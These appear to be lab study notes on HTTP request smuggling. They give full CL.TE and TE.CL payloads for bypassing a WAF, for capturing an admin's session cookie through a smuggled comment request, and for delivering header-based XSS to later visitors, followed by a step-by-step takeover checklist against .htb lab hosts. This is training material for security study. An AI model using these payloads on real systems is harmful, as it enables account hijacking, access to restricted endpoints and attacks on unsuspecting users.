HTTP request smuggling vulnerabilities have high impact because they enable:
| Attack Type | Impact |
|---|---|
| WAF Bypass | Access restricted paths/endpoints |
| Session Hijacking | Steal user cookies/tokens |
| Forced Actions | Make users perform unintended actions |
| Data Theft | Capture personal/sensitive data |
| XSS Amplification | Exploit otherwise unexploitable XSS |
WAFs examine:
- URL paths and query parameters
- Request headers
- Request body content
- Compute maliciousness scores
Blocking rules examples:
- Block requests to
/internal/from external IPs - Block requests containing SQL injection patterns
- Block requests with XSS payloads
WAF examines: Request URL, headers, visible body
Smuggled: Hidden in body, parsed as separate request by back-end
The smuggled request is never treated as a query string by the WAF!
POST / HTTP/1.1
Host: vuln.htb
Content-Length: 64
Transfer-Encoding: chunked
0
POST /internal/index.php HTTP/1.1
Host: localhost
Dummy: WAF sees: POST to / (allowed)
Back-end sees: POST to /internal/index.php (executed!)
GET / HTTP/1.1
Host: vuln.htb
Content-Length: 4
Transfer-Encoding: chunked
35
GET /internal/index.php HTTP/1.1
Host: localhost
0
WAF sees: GET to / (allowed)
Back-end sees: GET to /internal/index.php (executed!)
Force victims to submit their request data to a location you control (e.g., comment section, log file, API endpoint).
- Web app has comment functionality
- Comments are publicly visible
- App is vulnerable to CL.TE
POST /comments.php HTTP/1.1
Host: stealingdata.htb
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
name=htb-stdnt&comment=Hello+World%21POST / HTTP/1.1
Host: stealingdata.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Transfer-Encoding: chunked
0
POST /comments.php HTTP/1.1
Host: stealingdata.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
name=hacker&comment=testAdmin's normal request:
GET / HTTP/1.1
Host: stealingdata.htb
Cookie: sess=<admin_session_cookie>Back-end sees smuggled request + admin's request appended:
POST /comments.php HTTP/1.1
Host: stealingdata.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
name=hacker&comment=testGET / HTTP/1.1
Host: stealingdata.htb
Cookie: sess=<admin_session_cookie>The comment section now contains:
Hacker: testGET / HTTP/1.1
Host: stealingdata.htb
Cookie: sess=<admin_session_cookie>
Session cookie stolen! 🎯
[Request 1: Our POST with smuggled comment request in body]
[Request 2: Admin's GET / with session cookie]
[Request 1: Our POST / - empty body after chunk terminator]
[Request 2: POST /comments.php with admin's request as comment parameter]
The smuggled request ends with comment=test - admin's entire request becomes the comment value!
The Content-Length in smuggled request is crucial:
| CL Value | Result |
|---|---|
| Too small | Only partial data captured |
| Too large | Timeout waiting for more data |
| Just right | Full request captured |
Strategy: Trial and error, start with ~300 and adjust.
When smuggling authenticated actions, include:
- Your session cookie (
Cookieheader) - CSRF tokens (if required)
- All mandatory form fields
Place CSRF tokens at the beginning of smuggled body:
csrf=token123&name=hacker&comment=testIf CSRF is at the end, appended victim data may invalidate it.
Test for CL.TE with HELLO + 405 technique.
Log in to get valid session cookie and CSRF token.
Find where victim data can be captured:
- Comment sections
- Profile updates
- Log files
- API responses
POST / HTTP/1.1
Host: target.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
Transfer-Encoding: chunked
0
POST /comments.php HTTP/1.1
Host: target.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
Cookie: PHPSESSID=<your_session>
csrf=<your_token>&name=Hacker&comment=Stolen:- Send smuggling request
- Wait ~10 seconds for victim
- Check data sink for captured data
Replace your cookie with victim's stolen cookie:
Developer Tools → Application → Cookies → Edit session value
Reflected XSS in HTTP headers (e.g., Host, custom headers) is usually unexploitable:
GET / HTTP/1.1
Host: vuln.htb
Vuln: "><script>alert(1)</script>You cannot force a victim's browser to send custom headers!
Smuggle a request that injects XSS payload into victim's response.
POST / HTTP/1.1
Host: vuln.htb
Content-Length: 63
Transfer-Encoding: chunked
0
GET / HTTP/1.1
Vuln: "><script>alert(1)</script>
Dummy: - Our smuggled request with XSS in
Vulnheader left in buffer - Victim sends normal request
- Victim's request merges with our smuggled request
- Back-end processes request with XSS payload
- Victim receives response containing XSS
- XSS executes in victim's browser!
Attacker Server Victim
│ │ │
│ Smuggle XSS payload │ │
│─────────────────────────>│ │
│ │ │
│ │ XSS payload in buffer │
│ │ │
│ │ Normal GET / │
│ │<──────────────────────────│
│ │ │
│ │ Merges with XSS payload │
│ │ │
│ │ Response with XSS │
│ │──────────────────────────>│
│ │ │
│ │ XSS EXECUTES!
- No user interaction required (unlike normal reflected XSS)
- Mass exploitation - affects all users visiting after your payload
- Exploit "unexploitable" header-based XSS vulnerabilities
| Technique | Vulnerability Type | Goal | Payload Location |
|---|---|---|---|
| WAF Bypass | CL.TE / TE.CL | Access restricted paths | Smuggled URL |
| Data Theft | CL.TE | Steal cookies/tokens | Comment parameter |
| Forced Actions | CL.TE | Make user perform action | Smuggled request |
| XSS Amplification | CL.TE / TE.CL | Execute XSS on victims | Smuggled header |
- Test for CL.TE vulnerability (HELLO + 405)
- Authenticate with provided credentials
- Post a test comment to capture the request format
- Craft smuggling payload with comment endpoint
- Send and wait for admin to visit
- Check comments for leaked admin request
- Extract session cookie from comment
- Replace your cookie with admin's
- Access admin panel